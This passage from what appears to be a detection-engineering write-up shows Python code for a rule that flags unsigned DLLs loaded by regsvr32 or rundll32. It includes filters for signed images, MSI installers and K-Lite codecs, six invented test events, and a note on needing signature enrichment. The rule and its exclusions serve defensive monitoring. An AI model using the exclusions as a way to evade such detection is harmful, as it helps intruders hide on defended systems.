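    signed, status = ev.get('Signed'), ev.get('SignatureStatus')
    if str(signed).lower() == 'true':                          # filter_main_signed
        return False
    if field(ev, 'SignatureStatus') in TRUSTED_STATUS:         # filter_main_sig_status
        return False
    if strict and (signed in ABSENT or status in ABSENT):      # source recorded no signature state
        return False
    if (image in RUNDLL32 and loaded.startswith('c:\\windows\\installer\\')
            and loaded.endswith(('.tmp-\\microsoft.deployment.windowsinstaller.dll',
                                 '.tmp-\\avira.oe.setup.customactions.dll'))):
        return False                                           # filter_main_windows_installer
    if (image.startswith(('c:\\windows\\syswow64\\', 'c:\\windows\\system32\\',
                          'c:\\windows\\microsoft.net\\framework64'))
            and image.endswith('\\regasm.exe') and loaded.endswith('.dll')
            and loaded.startswith('c:\\windows\\assembly\\nativeimages')):
        return False                                           # filter_main_assembly
    if image in REGSVR32 and loaded.startswith(('c:\\program files (x86)\\k-lite codec pack\\',
                                                'c:\\program files\\k-lite codec pack\\')):
        return False                                           # filter_optional_klite_codec
    return True


# Constructed events; file names and paths are invented.
EVENTS = [
    # 1: regsvr32 loading an unsigned DLL dropped in C:\Temp
    {'Image': 'C:\\Windows\\System32\\regsvr32.exe', 'ImageLoaded': 'C:\\Temp\\payload.dll',
     'Signed': 'false', 'SignatureStatus': 'Unavailable'},
    # 2: the same utility loading a signed system DLL
    {'Image': 'C:\\Windows\\System32\\regsvr32.exe', 'ImageLoaded': 'C:\\Windows\\System32\\vbscript.dll',
     'Signed': 'true', 'SignatureStatus': 'Valid'},
    # 3: a source that records image loads but carries no signature fields at all
    {'Image': 'C:\\Windows\\System32\\rundll32.exe', 'ImageLoaded': 'C:\\Users\\Public\\helper.dll'},
    # 4: K-Lite codec registration, tuned out by the optional filter
    {'Image': 'C:\\Windows\\SysWOW64\\regsvr32.exe',
     'ImageLoaded': 'C:\\Program Files (x86)\\K-Lite Codec Pack\\Filters\\codec.ax',
     'Signed': 'false', 'SignatureStatus': 'Unavailable'},
    # 5: unsigned DLL loaded by a process outside the utility list
    {'Image': 'C:\\Windows\\System32\\notepad.exe', 'ImageLoaded': 'C:\\Temp\\payload.dll',
     'Signed': 'false', 'SignatureStatus': 'Unavailable'},
    # 6: rundll32 running an MSI custom action (filter_main_windows_installer)
    {'Image': 'C:\\Windows\\System32\\rundll32.exe',
     'ImageLoaded': 'C:\\Windows\\Installer\\MSI1A2B.tmp-\\Microsoft.Deployment.WindowsInstaller.dll',
     'Signed': 'false', 'SignatureStatus': 'Unavailable'},
]


def alerts(events=EVENTS, strict=True):
    """1-based indices of the events the rule fires on."""
    return [i for i, ev in enumerate(events, 1) if unsigned_dll_loaded(ev, strict)]


if __name__ == '__main__':
    print('with null/empty filters   :', alerts())               # [1]
    print('without null/empty filters:', alerts(strict=False))   # [1, 3]
```

Event 3 is the practical caveat: if your image_load source cannot tell you whether a DLL is signed, this rule is silent on it by design, and you need signature enrichment (Sysmon Event ID 7 with signature fields, or an EDR that exposes them) before the rule has anything to say.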